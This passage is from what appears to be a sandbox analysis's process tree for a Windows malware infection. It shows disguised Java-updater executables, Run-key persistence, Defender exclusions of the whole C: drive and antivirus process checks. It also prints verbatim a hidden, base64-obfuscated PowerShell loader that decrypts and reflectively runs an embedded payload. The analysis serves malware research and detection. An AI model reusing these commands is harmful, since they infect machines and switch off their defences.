                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
                                                                                                                                                                            68⤵
                                                                                                                                                                              PID:4516
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
                                                                                                                                                                                69⤵
                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                PID:4900
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
                                                                                                                                                                                  70⤵
                                                                                                                                                                                    PID:1672
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
                                                                                                                                                                                      71⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:4984
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater_update.exe"
                                                                                                                                                                                        72⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                        PID:4848
                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdater_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe\"'"
                                                                                                                                                                                        72⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:3856
                                                • C:\Users\Admin\AppData\Local\Temp\10476910101\9sWdA2p.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10476910101\9sWdA2p.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2968
                                                • C:\Users\Admin\AppData\Local\Temp\10476920101\TbV75ZR.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10476920101\TbV75ZR.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:4616
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                    6⤵
                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2840
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 612
                                                      7⤵
                                                      • Program crash
                                                      PID:324
                                                • C:\Users\Admin\AppData\Local\Temp\10476930101\bdb2b70855.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10476930101\bdb2b70855.exe"
                                                  5⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3868
                                                • C:\Users\Admin\AppData\Local\Temp\10476940101\Rm3cVPI.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10476940101\Rm3cVPI.exe"
                                                  5⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1140
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10476951121\ccosvAs.cmd"
                                                  5⤵
                                                    PID:3504
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10476951121\ccosvAs.cmd"
                                                      6⤵
                                                        PID:2912
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                          7⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Drops startup file
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:940
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4224
                                                    • C:\Users\Admin\AppData\Local\Temp\10476960101\93480e451a.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10476960101\93480e451a.exe"
                                                      5⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1036
                                                    • C:\Users\Admin\AppData\Local\Temp\10476970101\amnew.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10476970101\amnew.exe"
                                                      5⤵
                                                        PID:2976
                                                        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                          6⤵
                                                            PID:2732
                                                            • C:\Users\Admin\AppData\Local\Temp\10053200101\0df4a32d63.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10053200101\0df4a32d63.exe"
                                                              7⤵
                                                                PID:2700
                                                                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10053200101\0df4a32d63.exe"
                                                                  8⤵
                                                                    PID:3964
                                                                • C:\Users\Admin\AppData\Local\Temp\10053210101\1cd16d2239.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10053210101\1cd16d2239.exe"
                                                                  7⤵
                                                                    PID:3144
                                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10053210101\1cd16d2239.exe"
                                                                      8⤵
                                                                        PID:2832
                                                                • C:\Users\Admin\AppData\Local\Temp\10476980101\5uMVCoG.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10476980101\5uMVCoG.exe"
                                                                  5⤵
                                                                    PID:4644
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                      6⤵
                                                                        PID:4576
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                        6⤵
                                                                          PID:3856
                                                                      • C:\Users\Admin\AppData\Local\Temp\10476990101\qhjMWht.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\10476990101\qhjMWht.exe"
                                                                        5⤵
                                                                          PID:3476
                                                                        • C:\Users\Admin\AppData\Local\Temp\10477000101\larBxd7.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10477000101\larBxd7.exe"
                                                                          5⤵
                                                                            PID:3756
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
                                                                              6⤵
                                                                                PID:1692
                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                  tasklist
                                                                                  7⤵
                                                                                  • Enumerates processes with tasklist
                                                                                  PID:3632
                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                  findstr /I "opssvc wrsa"
                                                                                  7⤵
                                                                                    PID:2392
                                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                                    tasklist
                                                                                    7⤵
                                                                                    • Enumerates processes with tasklist
                                                                                    PID:4180
                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                    findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                    7⤵
                                                                                      PID:2920
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c md 689912
                                                                                      7⤵
                                                                                        PID:4424
                                                                                      • C:\Windows\SysWOW64\extrac32.exe
                                                                                        extrac32 /Y /E Exclusion.psd
                                                                                        7⤵
                                                                                          PID:1144
                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                          findstr /V "users" Findarticles
                                                                                          7⤵
                                                                                            PID:2400
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
                                                                                            7⤵
                                                                                              PID:2700
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
                                                                                              7⤵
                                                                                                PID:4496
                                                                                              • C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
                                                                                                Jordan.com b
                                                                                                7⤵
                                                                                                  PID:4840
                                                                                                • C:\Windows\SysWOW64\choice.exe
                                                                                                  choice /d y /t 5
                                                                                                  7⤵
                                                                                                    PID:4120
                                                                                              • C:\Users\Admin\AppData\Local\Temp\10477010101\LJl8AAr.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\10477010101\LJl8AAr.exe"
                                                                                                5⤵
                                                                                                  PID:1844
                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                    6⤵
                                                                                                      PID:1528
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10477020101\mTk60rz.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10477020101\mTk60rz.exe"
                                                                                                    5⤵
                                                                                                      PID:4296
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\onefile_4296_133884122556133530\ZSoeRVBe.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\10477020101\mTk60rz.exe
                                                                                                        6⤵
                                                                                                          PID:4752
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10477030101\n0hEgR9.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10477030101\n0hEgR9.exe"
                                                                                                        5⤵
                                                                                                          PID:1336
                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                            6⤵
                                                                                                              PID:324
                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                              6⤵
                                                                                                                PID:928
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10477040101\RYZusWg.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10477040101\RYZusWg.exe"
                                                                                                              5⤵
                                                                                                                PID:416
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10477050101\UZPt0hR.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10477050101\UZPt0hR.exe"
                                                                                                                5⤵
                                                                                                                  PID:7088
                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                    cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                    6⤵
                                                                                                                      PID:5468
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                        7⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        PID:4496
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      "C:\Windows\system32\svchost.exe"
                                                                                                                      6⤵
                                                                                                                        PID:5288
                                                                                                                        • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                                                          "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                                                          7⤵
                                                                                                                            PID:5716
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                                            7⤵
                                                                                                                              PID:5060
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10477060101\VrQSuEQ.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10477060101\VrQSuEQ.exe"
                                                                                                                          5⤵
                                                                                                                            PID:1736
                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                              6⤵
                                                                                                                                PID:5128
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2i0393.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2i0393.exe
                                                                                                                          3⤵
                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Identifies Wine through registry keys
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:1488
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                                                                                                                      1⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:4824
                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                        rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                                                                                                                        2⤵
                                                                                                                          PID:4516
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:1320
                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                          rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
                                                                                                                          2⤵
                                                                                                                            PID:2912
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\ssvchost
                                                                                                                          1⤵
                                                                                                                            PID:212
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                            1⤵
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Identifies Wine through registry keys
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:1844
                                                                                                                          • C:\Users\Admin\AppData\Roaming\ssvchost
                                                                                                                            C:\Users\Admin\AppData\Roaming\ssvchost
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1092
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2840 -ip 2840
                                                                                                                            1⤵
                                                                                                                              PID:4840
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe"
                                                                                                                              1⤵
                                                                                                                                PID:2692
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
                                                                                                                                  2⤵
                                                                                                                                    PID:3132
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
                                                                                                                                      C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
                                                                                                                                      3⤵
                                                                                                                                        PID:3804
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                                                                                                          C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                                                                                                          4⤵
                                                                                                                                            PID:2616
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
                                                                                                                                              C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
                                                                                                                                              5⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:5108
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                                                                                                                                                C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                                                                                                                                                6⤵
                                                                                                                                                  PID:2824
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
                                                                                                                                                    7⤵
